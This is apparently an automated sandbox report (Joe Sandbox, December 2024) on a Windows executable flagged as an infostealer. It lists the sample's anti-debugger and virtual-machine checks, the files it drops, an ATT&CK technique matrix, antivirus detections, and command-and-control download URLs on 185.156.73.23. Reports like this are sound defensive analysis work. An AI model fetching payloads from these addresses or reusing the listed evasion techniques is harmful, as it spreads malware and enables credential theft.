Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Window / User API: threadDelayed 933
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Window / User API: threadDelayed 1008
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Window / User API: threadDelayed 944
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1]
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2332 | Thread sleep count: 163 > 30
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2332 | Thread sleep count: 142 > 30
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2504 | Thread sleep count: 905 > 30
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2504 | Thread sleep time: -1810905s >= -30000s
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 3736 | Thread sleep count: 962 > 30
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 3736 | Thread sleep time: -1924962s >= -30000s
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2332 | Thread sleep count: 110 > 30
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2332 | Thread sleep count: 100 > 30
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2332 | Thread sleep count: 91 > 30
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 3624 | Thread sleep count: 951 > 30
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 3624 | Thread sleep time: -1902951s >= -30000s
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 3444 | Thread sleep count: 933 > 30
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 3444 | Thread sleep time: -1866933s >= -30000s
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 4048 | Thread sleep count: 1008 > 30
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 4048 | Thread sleep time: -2017008s >= -30000s
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 4900 | Thread sleep count: 944 > 30
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 4900 | Thread sleep time: -1888944s >= -30000s
Source: zmTSHkabY6.exe, zmTSHkabY6.exe, 00000000.00000002.3220112390.000000000099D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.7.dr | Binary or memory string: VMware
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: zmTSHkabY6.exe, 00000000.00000002.3223329343.0000000005603000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWUd
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000002.3223329343.0000000005603000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: zmTSHkabY6.exe, 00000000.00000002.3220112390.000000000099D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.7.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | File opened: NTICE
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | File opened: SICE
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_0081C9F3 rdtsc 0_2_0081C9F3
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_0041366F mov eax, dword ptr fs:[00000030h] 0_2_0041366F
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_0040EF0D mov eax, dword ptr fs:[00000030h] 0_2_0040EF0D
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h] 0_2_10007A76
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h] 0_2_10005F25
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00D99C83 push dword ptr fs:[00000030h] 0_2_00D99C83
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00E938D6 mov eax, dword ptr fs:[00000030h] 0_2_00E938D6
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00E8F174 mov eax, dword ptr fs:[00000030h] 0_2_00E8F174
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00E8092B mov eax, dword ptr fs:[00000030h] 0_2_00E8092B
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00E80D90 mov eax, dword ptr fs:[00000030h] 0_2_00E80D90
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00402C70 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,0_2_00402C70
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00409949 SetUnhandledExceptionFilter,0_2_00409949
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00408ED5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00408ED5
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_004097B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004097B2
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00E8913C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E8913C
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00E89A19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E89A19
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00E89BB0 SetUnhandledExceptionFilter,0_2_00E89BB0
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00E8C31A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E8C31A
Source: zmTSHkabY6.exe, zmTSHkabY6.exe, 00000000.00000002.3220112390.000000000099D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: 'Program Manager
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_004099B3 cpuid 0_2_004099B3
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\zmTSHkabY6.exe | Code function: 0_2_00409BE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00409BE5
Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: MsMpEng.exe
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Command and Scripting Interpreter | 1 DLL Side-Loading | 2 Process Injection | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 24 Virtualization/Sandbox Evasion | LSASS Memory | 781 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Process Injection | Security Account Manager | 24 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 3 Process Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 13 Software Packing | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 223 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

Source | Detection | Scanner | Label
zmTSHkabY6.exe | 57% | Virustotal |
zmTSHkabY6.exe | 42% | ReversingLabs | Win32.Infostealer.Generic
zmTSHkabY6.exe | 100% | Avira | HEUR/AGEN.1320706
zmTSHkabY6.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp | false | | unknown
http://185.156.73.23/dll/download | false | | unknown
http://185.156.73.23/files/download | false | | unknown
http://185.156.73.23/dll/key | false | | unknown
http://185.156.73.23/soft/download | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.156.73.23/files/downloadJ | zmTSHkabY6.exe, 00000000.00000003.2491315087.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2429953901.0000000005834000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.156.73.23/files/download00 | zmTSHkabY6.exe, 00000000.00000003.2526387694.0000000005834000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.156.73.23/files/download4 | zmTSHkabY6.exe, 00000000.00000003.2491315087.0000000005834000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.156.73.23/files/download://1H | zmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2644398463.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2617109524.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2681187095.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.156.73.23/files/downloadt | zmTSHkabY6.exe, 00000000.00000003.2546745947.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2526387694.0000000005834000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://g-cleanit.hk | zmTSHkabY6.exe, 00000000.00000003.2881415496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881415496.0000000005725000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2882255970.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881735565.000000000576B000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr | false | | high
http://185.156.73.23/soft/download$MX | zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.156.73.23/soft/downloadV | zmTSHkabY6.exe, 00000000.00000003.2881735565.0000000005834000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.156.73.23/files/downloadx | zmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.156.73.23/files/downloadZ | zmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2644398463.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2617109524.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2681187095.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://upx.sf.net | Amcache.hve.7.dr | false | | high
http://185.156.73.23/soft/download://1H | zmTSHkabY6.exe, 00000000.00000003.2881735565.0000000005834000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.156.73.23/dll/downloadVMj | zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174 | zmTSHkabY6.exe, 00000000.00000003.2881415496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881415496.0000000005725000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2882255970.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881735565.000000000576B000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr | false | | high
http://185.156.73.23/files/downloadb | zmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://iplogger.org/1Pz8p7 | zmTSHkabY6.exe, 00000000.00000003.2881415496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881415496.0000000005725000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2882255970.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881735565.000000000576B000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr | false | | high
http://185.156.73.23/soft/downloadtM | zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.156.73.23 | unknown | Russian Federation | 48817 | RELDAS-NETRU | false
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1578897
                                              Start date and time:2024-12-20 16:21:07 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 14s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:10
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:zmTSHkabY6.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:cab7af24073c5c1c62a2957dd5983c98.exe
                                              Detection:MAL
                                              Classification:mal100.evad.winEXE@2/15@0/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240s for sample files taking high CPU consumption
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.189.173.21, 172.202.163.200, 13.107.246.63, 20.190.181.1
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:22:54 | API Interceptor | 1651655x Sleep call for process: zmTSHkabY6.exe modified
10:24:36 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.156.73.23 | 8V0INSl0E2.exe | malicious | Unknown | 185.156.73.23/soft/download
185.156.73.23 | BEd2lJRXFM.exe | malicious | Unknown | 185.156.73.23/soft/download
                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RELDAS-NETRU | 8V0INSl0E2.exe | malicious | Unknown | 185.156.73.23
RELDAS-NETRU | BEd2lJRXFM.exe | malicious | Unknown | 185.156.73.23
RELDAS-NETRU | beacon.exe | malicious | CobaltStrike | 185.156.73.37
                                              No context
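Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] | 8V0INSl0E2.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] | BEd2lJRXFM.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] | file.exe | malicious | Unknown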
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.9857242087215285
                                                                  Encrypted:false
                                                                  SSDEEP:192:jjYfbbblUQ0Co1nh1qjudvszuiFsZ24IO8i6:apUrCo1nh1qjPzuiFsY4IO8i
                                                                  MD5:CFB3AA96B4C8FD8014C331905B15E8C2
                                                                  SHA1:D4E036297E2684DE62E29AD39B7A32339BCFCDB2
                                                                  SHA-256:863D2FAC42236843ED1EDA15110E7AF637328ACF30BC75F2E8F327340D971064
                                                                  SHA-512:BBEA867CDDBD8FC1B89E5874450B80184C2AAA828D99914DC990F8D094B2EB15D5AFB144370A7AB1409E2F6CF4C17B845E786E79201D84357DFC9A2F7C6CBF3B
                                                                  Malicious:true
                                                                  Reputation:low
Preview:
Version=1
EventType=BEX
EventTime=133791818432708767
ReportType=2
Consent=1
UploadTime=133791818438020945
ReportStatus=655456
ReportIdentifier=aec1dd16-9074-4b30-ab4d-938fecaa0ca7
IntegratorReportIdentifier=196433a6-079c-4f3e-bb7c-bf24d979bcf1
Wow64Host=34404
Wow64Guest=332
NsAppName=zmTSHkabY6.exe
AppSessionGuid=00000978-0001-0014-a08f-f9f7f252db01
TargetAppId=W:000643ad30bdf4d8dcefd3c9d046ca9987000000ffff!0000a41a42e84999503cf76b04edefe3c37f87023285!zmTSHkabY6.exe
TargetAppVer=2
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 14 streams, Fri Dec 20 15:24:03 2024, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):46310
                                                                  Entropy (8bit):2.549488396992911
                                                                  Encrypted:false
                                                                  SSDEEP:192:NCtEdiXC1tLXqLCOioGF9Z67nt6NVMoEsUjTWNZR9TLHKmC4yUNOmjvTR9Y9JnvW:cm1tmZPGF6Dt6NSQkTKHe4yiPpKvOS4b
                                                                  MD5:3881907AA5874950FB8B1BAF71A478A7
                                                                  SHA1:36B4C78F42D1D9DCAF00D30D172E81A302F2FC72
                                                                  SHA-256:3A7779D05F8A44A663EA74008B194209D556B580D79CF94E6E99D8E781FE6AFD
                                                                  SHA-512:2D60FCAFF3B9462A82A4A3ACE8324C765004A36B4BBEE71612EC7F170F9A4A8BDEAA6450765DE75C6B71010EF0E8A0EC4951CD4862636904DC87A0BF2F796B71
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8396
                                                                  Entropy (8bit):3.6961863290447483
                                                                  Encrypted:false
